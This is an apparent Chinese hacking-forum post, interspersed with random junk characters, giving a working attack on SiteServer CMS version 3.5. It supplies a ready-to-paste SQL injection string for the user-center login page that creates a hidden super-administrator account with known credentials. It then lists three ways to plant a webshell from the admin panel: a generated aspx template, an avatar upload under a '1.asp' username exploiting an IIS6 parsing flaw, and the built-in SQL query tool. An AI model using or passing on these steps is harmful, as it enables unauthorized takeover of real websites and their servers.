经测试秒杀最新的3.5版
; x# K* ?0 ~- X3 w0 i! D7 I- h- x2 F/ Q# F. W
stieserver官网:www.siteserver.cn4 l3 f& h: L# s5 z% ~! x' g) [5 G; H& U1 n
: ]0 W- F- O5 w3 d : i% B; q/ [* r
$ @$ c2 O( K; ^3 AEXP:
% {- d1 _: E2 o) v" n& N9 u+ k8 u$ u, h& e/ e
直接访问UserCenter/login.aspx
$ O* l' O7 a7 _% _$ G
. z) U6 G0 y1 N ! V3 s- k: f7 e4 w. x- q4 t' X& j
& |' `" B0 F$ ~ j5 e
用户名处输入:
$ U$ [ Y3 a3 w. P. R
/ i9 e% |6 D9 y+ ?123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--+ c/ A7 ^$ c' _. |( Y
z7 ]7 u- \4 g4 _2 r; A / b, j7 w/ U: |; w; |& t' ^
* j& |& {* c2 d- b* C
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。0 R/ A( A: I- T/ U2 k7 |
3 h% P# v- U7 I9 P3 |
2 A4 O$ r* Q) F
: i) O- L: g) s- G% l) w之后再访问后台SiteServer/login.aspx用插入的用户登陆
! C) A# z) | p+ d8 `+ P/ \5 z$ V; s4 a2 k; W0 |) i; e) p
* q! P6 I' S" c* X9 E8 Y; k' |; N, z# H$ X5 y- f3 j
后台拿webshell的三种方法:4 l6 K% \% P! v9 X
3 u9 g2 _3 }/ r. d4 `
一、
' N% c( X1 f4 W4 A, `; F9 p1 q* {# J" v
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx6 }# a4 V; t# r* x- y% b
1 ]+ s6 X6 F2 r9 D9 Q二、
& `4 H% O% G$ s2 ]0 L3 f6 |4 ~& F% h& ^7 [3 p
成员权限-》添加用户-》用户名为:1.asp2 L( [, J7 d% a
: d/ B) j$ d, `: X4 |* i7 B
http://127.0.0.1/usercenter/
% E) J6 p4 e9 B* K
# A2 z1 v9 q; W+ `用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell# c+ |4 m! F( }2 v
/ b4 f, R2 S% v* }1 o& I1 `
(ps:后台添加用户时不会验证是否含有非法字符)& G. M4 b9 H- a
8 O5 [2 W: V( F/ E0 P Q0 c& n" O
三、
8 y5 Q" U( u1 }) R' D# [& c$ ?* N3 R# v6 G5 G# O2 d, q/ \
系统工具-》实用工具-》机器参数查看& R3 d1 s8 {8 B. K& o; f6 {
可以看到数据库类型、名称,WEB路径 Z$ x% n' {- {$ @% W$ G8 X
2 R8 _% F7 B6 [( p系统工具-》数据库工具-》SQL语句查询, ?+ n1 H4 r" ^; }9 O+ y* D
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。3 L0 w% t4 D0 }5 T: I: j; H
9 |, E/ p0 N' G2 M |